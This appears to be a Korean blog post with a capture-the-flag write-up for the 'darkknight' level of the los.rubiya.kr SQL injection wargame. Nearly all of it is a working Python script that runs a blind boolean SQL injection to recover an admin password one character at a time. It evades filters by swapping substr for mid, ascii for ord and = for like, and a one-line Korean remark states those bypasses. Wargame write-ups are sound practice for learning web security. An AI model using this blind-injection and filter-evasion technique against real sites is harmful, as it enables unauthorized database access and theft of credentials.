import requests

pw = ""
cookie = {"PHPSESSID": "bs5vokabo2qae2ome4934v09gr"}
page = "darkknight_5cfbc71e68e09f1b039a8204d1a81456"
code = '0 or id like "admin"'

andsign = 'and'
equal = 'like'
_substr = 'mid'
_ascii = 'ord'

length = 0

print("find length")
for i in range(1, 32):
    url = f"https://los.rubiya.kr/chall/{page}.php?no=" + \
        f'{code} {andsign} length(pw) {equal} {str(i)}'
    print(url)
    res = requests.get(url, cookies=cookie)
    if "Hello admin" in res.text:
        length = i
        print(i)
        break;

print("find password")
for i in range(1, length + 1):
    for j in range(32, 128):
        url = f"https://los.rubiya.kr/chall/{page}.php?no=" + \
            f'{code} {andsign} {_ascii}({_substr}(pw,{str(i)},1)) {equal} {str(j)}'
        res = requests.get(url, cookies=cookie)
        if "Hello admin" in res.text:
            pw += chr(j)
            print(pw)
            break

substr은 mid 쓰고 ascii는 ord 쓰고, =는 like 쓰면 풀린다.

728x90

'해킹 > writeup' 카테고리의 다른 글

los.rubiya.kr - giant  (0) 2021.08.29
los.rubiya.kr - bugbear  (0) 2021.08.29
webhacking.kr - 52  (0) 2021.08.25
dreamhack.io - web-ssrf  (0) 2021.08.25
rubiya - golem  (0) 2021.08.18

+ Recent posts

티스토리툴바